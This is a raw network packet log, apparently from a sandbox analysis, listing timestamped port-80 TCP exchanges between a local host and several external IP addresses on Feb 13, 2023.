                                                                                                                  Feb 13, 2023 19:00:05.258099079 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258117914 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258306980 CET4984480192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:05.258322001 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258359909 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258379936 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258474112 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258479118 CET4984480192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:05.258500099 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258519888 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.258641005 CET4984480192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:05.258654118 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271416903 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271476984 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271517038 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271558046 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271600962 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271666050 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271704912 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.271775007 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.274862051 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.274929047 CET8049844217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:05.275177956 CET4984480192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:06.746186018 CET4984480192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.761976004 CET4984580192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.774674892 CET8049845217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:07.774955034 CET4984580192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.775017023 CET4984580192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.787729979 CET8049845217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:07.792687893 CET8049845217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:07.792706013 CET8049845217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:07.793023109 CET4984580192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.793045044 CET4984580192.168.11.20217.160.0.37
                                                                                                                  Feb 13, 2023 19:00:07.805803061 CET8049845217.160.0.37192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:26.610032082 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:26.735486984 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:26.736407042 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:26.736594915 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:26.903141022 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.744930029 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745023012 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745090008 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745152950 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745214939 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745279074 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.745357037 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.745357037 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.745467901 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.746512890 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.746606112 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.746675014 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.746741056 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.746764898 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.746886015 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.871916056 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.872004032 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.872068882 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.872134924 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.872194052 CET8049848103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:27.872291088 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:27.872433901 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:28.241400957 CET4984880192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:29.256901979 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:29.382143021 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:29.382496119 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:29.382496119 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:29.551431894 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248259068 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248373985 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248431921 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248486042 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248538017 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248590946 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.248630047 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.248697996 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.248805046 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.249964952 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.250037909 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.250097036 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.250150919 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.250256062 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.250319958 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.376979113 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.377028942 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.377064943 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.377100945 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.377342939 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.382685900 CET8049849103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:30.382977009 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:30.896903992 CET4984980192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:31.912786961 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.039108038 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.039505959 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.040086985 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.040196896 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.167838097 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.168245077 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.168441057 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.168674946 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.168937922 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.169064999 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.295260906 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.295634985 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.295821905 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.296205997 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.296411991 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.296566010 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:32.297229052 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.422534943 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.423481941 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:32.424490929 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.197335005 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.197359085 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.197458029 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.197515965 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.198363066 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.198478937 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.198502064 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.198502064 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.198662996 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.199246883 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.199357033 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.199378967 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.199398041 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.199472904 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.199521065 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.324253082 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.324362040 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.324420929 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.324481010 CET8049850103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:33.324569941 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.324651957 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:33.552643061 CET4985080192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:34.572988033 CET4985180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:34.697927952 CET8049851103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:34.698194981 CET4985180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:34.698266983 CET4985180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:34.865330935 CET8049851103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:35.444925070 CET8049851103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:35.445521116 CET4985180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:35.445521116 CET4985180192.168.11.20103.191.208.50
                                                                                                                  Feb 13, 2023 19:00:35.572284937 CET8049851103.191.208.50192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.620745897 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.630321026 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.630565882 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.630637884 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.639487028 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.806902885 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.806973934 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.807017088 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.807055950 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.807095051 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.807126045 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.807168007 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.807168007 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.807291985 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.807291985 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:40.816124916 CET8049852188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:40.816436052 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:42.144706011 CET4985280192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:43.160013914 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:43.168674946 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.169039011 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:43.169122934 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:43.177783966 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344225883 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344245911 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344258070 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344269037 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344495058 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:43.344841957 CET8049853188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:43.344970942 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:44.675528049 CET4985380192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.690980911 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.700418949 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.700819969 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.701263905 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.701355934 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.710315943 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710374117 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710464954 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710508108 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710546970 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710618973 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.710787058 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.710849047 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710906982 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710952044 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.710953951 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.710992098 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.711131096 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.711134911 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.711257935 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.711453915 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.719886065 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.719944000 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.719985008 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720025063 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720043898 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.720103025 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720144987 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720237017 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.720288038 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720434904 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.720504045 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720607996 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.720614910 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720657110 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720766068 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720767975 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.720875025 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.720935106 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:45.729070902 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.729126930 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.729492903 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.729846001 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.729903936 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.729944944 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.771339893 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.994868040 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.994941950 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.994975090 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.995003939 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.995033979 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:45.995125055 CET4985480192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:46.004117012 CET8049854188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:48.221528053 CET4985580192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:48.230756998 CET8049855188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:48.230933905 CET4985580192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:48.231018066 CET4985580192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:48.240150928 CET8049855188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:48.431472063 CET8049855188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:48.431539059 CET8049855188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:48.431766033 CET4985580192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:48.432152033 CET4985580192.168.11.20188.114.97.3
                                                                                                                  Feb 13, 2023 19:00:48.440980911 CET8049855188.114.97.3192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:54.517636061 CET4985780192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:54.676175117 CET8049857162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:54.676453114 CET4985780192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:54.676522970 CET4985780192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:54.834935904 CET8049857162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:54.846653938 CET8049857162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:54.846755981 CET8049857162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:54.847131014 CET4985780192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:56.188294888 CET4985780192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:57.204020023 CET4985880192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:57.362551928 CET8049858162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:57.362895012 CET4985880192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:57.362962961 CET4985880192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:57.521251917 CET8049858162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:57.531254053 CET8049858162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:57.531902075 CET8049858162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:00:57.532218933 CET4985880192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:58.875360966 CET4985880192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:00:59.891007900 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.053585052 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.053903103 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.054460049 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.054549932 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.217375040 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217451096 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217502117 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217550993 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217596054 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217642069 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217638969 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.217690945 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217741013 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217787027 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.217854023 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.217968941 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.218142033 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.380914927 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.380961895 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.380994081 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381025076 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381055117 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381086111 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381117105 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381150007 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381176949 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.381180048 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381263971 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381349087 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:00.381442070 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.381474972 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.423228025 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.543873072 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.543920040 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.544159889 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.544204950 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.544238091 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.547704935 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.547755003 CET8049859162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:00.547897100 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:01.562179089 CET4985980192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:02.577810049 CET4986080192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:02.736145020 CET8049860162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:02.736341953 CET4986080192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:02.736552000 CET4986080192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:02.895097017 CET8049860162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:02.906559944 CET8049860162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:02.906642914 CET8049860162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:02.907012939 CET4986080192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:02.907012939 CET4986080192.168.11.20162.241.225.69
                                                                                                                  Feb 13, 2023 19:01:03.065860987 CET8049860162.241.225.69192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:08.409190893 CET4986180192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:01:08.505214930 CET8049861142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:08.505518913 CET4986180192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:01:08.505626917 CET4986180192.168.11.20142.44.131.177
                                                                                                                  Feb 13, 2023 19:01:08.601670980 CET8049861142.44.131.177192.168.11.20
                                                                                                                  Feb 13, 2023 19:01:09.064600945 CET8049861142.44.131.177192.168.11.20
